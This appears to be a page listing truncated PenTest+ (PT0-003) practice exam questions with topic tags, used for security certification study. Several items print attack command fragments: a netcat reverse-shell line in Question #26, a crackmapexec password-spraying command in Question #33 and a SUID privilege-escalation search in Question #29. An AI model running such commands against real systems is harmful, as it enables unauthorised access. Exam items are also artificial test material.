PT0-003 Exam Questions
302 real PT0-003 exam questions with expert-verified answers and explanations. Page 1 of 7.
- Question #1Network Security
A penetration tester downloads a JAR file that is used in an organization's production environment. The tester evaluates the contents of the JAR file to identify potentially vulner...
Penetration testingSoftware Composition Analysis (SCA)Vulnerability assessment - Question #2Network Security
During a penetration testing engagement, a tester targets the internet-facing services used by the client. Which of the following describes the type of assessment that should be co...
Penetration testingExternal assessmentScope of work - Question #3Network Security
A penetration tester has just started a new engagement. The tester is using a framework that breaks the life cycle into 14 components. Which of the following frameworks is the test...
Penetration testing frameworksOSSTMMCybersecurity standards - Question #4Network Security
A penetration tester is evaluating a SCADA system. The tester receives local access to a workstation that is running a single application. While navigating through the application,...
Penetration testingSCADA securityKiosk escapePrivilege escalation - Question #5Network Security
A penetration tester presents the following findings to stakeholders: Control | Number of findings | Risk | Notes Encryption | 1 | Low | Weak algorithm noted Patching | 8 | Medium...
Penetration testingVulnerability managementSecure SDLCSCA tool - Question #6Network Security
While conducting a reconnaissance activity, a penetration tester extracts the following information: Emails: - [email protected] - [email protected] - [email protected] Which of the follo...
Penetration testingReconnaissanceSocial engineeringAttack vectors - Question #7Network Security
A penetration tester gains access to a host but does not have access to any type of shell. Which of the following is the best way for the tester to further enumerate the host and t...
Penetration testingPost-exploitationEnumeration toolsNetcat - Question #9Network Security
A penetration tester cannot find information on the target company's systems using common OSINT methods. The tester's attempts to do reconnaissance against internet-facing resource...
Penetration testingReconnaissanceWAF evasionCode repository scanning - Question #10Network Security
During a penetration test, the tester uses a vulnerability scanner to collect information about any possible vulnerabilities that could be used to compromise the network. The teste...
Penetration testingVulnerability validationSNMP enumerationFalse positives - Question #11Network Security
A penetration tester is working on a security assessment of a mobile application that was developed in-house for local use by a hospital. The hospital and its customers are very co...
Penetration testingMobile application securitySecurity assessment methodology - Question #12Network Security
Before starting an assessment, a penetration tester needs to scan a Class B IPv4 network for open ports in a short amount of time. Which of the following is the best tool for this...
Penetration testing toolsPort scanningNetwork reconnaissancemasscan - Question #13Attacks and Exploits
A penetration tester is performing an authorized physical assessment. During the test, the tester observes an access control vestibule and on-site security guards near the entry do...
physical penetration testingsocial engineeringtailgatingaccess control bypass - Question #14Attacks and Exploits
During a web application assessment, a penetration tester identifies an input field that allows JavaScript injection. The tester inserts a line of JavaScript that results in a prom...
web application securityJavaScript injectionXSSclient-side attacks - Question #15Post-exploitation and Lateral Movement
A penetration tester is working on an engagement in which a main objective is to collect confidential information that could be used to exfiltrate data and perform a ransomware att...
post-exploitationdata exfiltrationcredential dumpinginternal reconnaissance - Question #16Vulnerability Discovery and Analysis
During a penetration test, the tester identifies several unused services that are listening on all targeted internal laptops: Which of the following technical controls should the t...
system hardeningvulnerability managementservice enumerationrisk reduction - Question #17Reconnaissance and enumeration
A penetration tester writes the following script to enumerate a /24 network: The tester executes the script, but it fails with the following error: -bash: syntax error near unexpec...
shell scriptingbash scriptingnetwork enumerationscript debugging - Question #18Attacks and Exploits
A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester u...
payload executioninitial accessWindows commandspersistence - Question #19Vulnerability Discovery and Analysis
During a vulnerability assessment, a penetration tester configures the scanner sensor and performs the initial vulnerability scanning under the client's internal network. The teste...
vulnerability scanningdiscovery scanscope managementscan methodology - Question #20Vulnerability Discovery and Analysis
Which of the following describes the process of determining why a vulnerability scanner is not providing results?
vulnerability scanningtroubleshootingroot cause analysisscan errors - Question #21Reconnaissance and enumeration
During a security audit, a penetration tester wants to run a process to gather information about a target network's domain structure and associated IP addresses. Which of the follo...
domain enumerationDNS enumerationreconnaissance toolsDnsenum - Question #22Reconnaissance and enumeration
During an external penetration test, a tester receives the following output from a tool: test.comptia.org info.comptia.org vpn.comptia.org exam.comptia.org Which of the following c...
subdomain enumerationOSINTreconnaissance toolsamass - Question #23Engagement management
A penetration tester is developing the rules of engagement for a potential client. Which of the following would most likely be a function of the rules of engagement?
rules of engagementengagement planningtesting windowlegal agreements - Question #24Post-exploitation and Lateral Movement
During an assessment, a penetration tester manages to get RDP access via a low-privilege user. The tester attempts to escalate privileges by running the following commands: Import-...
privilege escalationPrintNightmareWindows post-exploitationuser sessions - Question #25Attacks and Exploits
A tester is performing an external phishing assessment on the top executives at a company. Two- factor authentication is enabled on the executives' accounts that are in the scope o...
phishing2FA bypasstyposquattingEvilginxsocial engineering - Question #26Attacks and Exploits
A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability. The tester uses the following command: nc -e /bin/sh 10.10....
command injectionweb application exploitsbypass techniquesshell scripting - Question #27Vulnerability Discovery and Analysis
A penetration tester needs to identify all vulnerable input fields on a customer website. Which of the following tools would be best suited to complete this request?
web application securityDASTvulnerability scanninginput validation - Question #28Attacks and Exploits
A penetration tester enumerates a legacy Windows host on the same subnet. The tester needs to select exploit methods that will have the least impact on the host's operating stabili...
legacy Windowsexploit methodsrespondercredential harvestinglow impact attacks - Question #29Post-exploitation and Lateral Movement
A penetration tester executes multiple enumeration commands to find a path to escalate privileges. Given the following command: find / -user root -perm -4000 -exec ls -ldb {} \; 2>...
privilege escalationLinux permissionsSUID binariesenumeration commands - Question #30Vulnerability Discovery and Analysis
A penetration tester creates a list of target domains that require further enumeration. The tester writes the following script to perform vulnerability scanning across the domains:...
shell scriptingbash scriptingvulnerability scanningscript debuggingNikto - Question #31Post-exploitation and Lateral Movement
Given the following script: Which of the following is the penetration tester most likely trying to do?
command and controlremote executionpayload stagingpost-exploitation - Question #32Reconnaissance and enumeration
A penetration tester completed OSINT work and needs to identify common subdomains for mydomain.com. Which of the following is the best command for the tester to use?
subdomain enumerationOSINTreconnaissance toolsDNS lookup - Question #33Attacks and Exploits
While performing an internal assessment, a tester uses the following command: crackmapexec smb 192.168.1.0/24 -u user.txt -p Summer123@ Which of the following is the main purpose o...
password sprayingcrackmapexecSMB attacks - Question #34Reconnaissance and Enumeration
A penetration tester finishes an initial discovery scan for hosts on a /24 customer subnet. The customer states that the production network is composed of Windows servers but no co...
honeypotsreconnaissance anomaliesscan interpretation - Question #35Post-exploitation and Lateral Movement
A penetration tester gains access to a Windows machine and wants to further enumerate users with native operating system credentials. Which of the following should the tester use?
Windows enumerationnet.exeuser enumeration - Question #37Attacks and Exploits
A penetration tester is authorized to perform a DoS attack against a host on a network. Given the following input: Which of the following attack types is most likely being used in...
DoS attackSYN flood - Question #38Engagement Management
Which of the following components should a penetration tester include in an assessment report?
penetration test reportattack narrativereporting - Question #39Engagement Management
Which of the following tasks would ensure the key outputs from a penetration test are not lost as part of the cleanup and restoration activities?
artifact preservationevidence collectionengagement closure - Question #40Vulnerability Discovery and Analysis
In a cloud environment, a security team discovers that an attacker accessed confidential information that was used to configure virtual machines during their initialization. Throug...
cloud securitymetadata servicesinformation disclosure - Question #41Attacks and Exploits
During an engagement, a penetration tester needs to break the key for the Wi-Fi network that uses WPA2 encryption. Which of the following attacks would accomplish this objective?
WPA2KRACK attackWi-Fi security - Question #42Engagement Management
During a web application assessment, a penetration tester identifies an administrative tool that would allow for the production database to be deleted without authorization. Which...
rules of engagementscope managementdestructive testing - Question #43Post-exploitation and Lateral Movement
The following file was obtained during reconnaissance: Which of the following is most likely to be successful if a penetration tester achieves non- privileged user access?
information disclosureLinux enumerationsensitive data - Question #44Vulnerability Discovery and Analysis
A penetration tester is testing a power plant's network and needs to avoid disruption to the grid. Which of the following methods is most appropriate to identify vulnerabilities in...
ICS/SCADA securitypassive reconnaissanceport mirroring - Question #45Vulnerability Discovery and Analysis
A penetration tester finished a security scan and uncovered numerous vulnerabilities on several hosts. Based on the targets' EPSS and CVSS scores, which of the following targets is...
vulnerability prioritizationCVSSEPSS - Question #46Engagement Management
A penetration tester discovers evidence of an advanced persistent threat on the network that is being tested. Which of the following should the tester do next?
APTincident responsereporting findings - Question #47Vulnerability Discovery and Analysis
A penetration tester needs to evaluate the order in which the next systems will be selected for testing. Given the following output: Hostname | IP address | CVSS 2.0 | EPSS hrdatab...
vulnerability prioritizationEPSSCVSS - Question #48Reconnaissance and Enumeration
During an engagement, a penetration tester wants to enumerate users from Linux systems by using finger and rwho commands. However, the tester realizes these commands alone will not...
Linux enumerationSMB enumerationsmbclient - Question #49Attacks and Exploits
A penetration tester wants to check the security awareness of specific workers in the company with targeted attacks. Which of the following attacks should the penetration tester pe...
social engineeringspear phishingsecurity awareness - Question #50Attacks and Exploits
A penetration tester wants to create a malicious QR code to assist with a physical security assessment. Which of the following tools has the built-in functionality most likely need...
client-side attacksBeEFphysical security assessment - Question #51Vulnerability Discovery and Analysis
A penetration tester needs to help create a threat model of a custom application. Which of the following is the most likely framework the tester will use?
threat modelingDREADrisk assessment - Question #52Post-exploitation and Lateral Movement
During a penetration test, a tester attempts to pivot from one Windows 10 system to another Windows system. The penetration tester thinks a local firewall is blocking connections....
Windows firewallnetshlateral movementpost-exploitation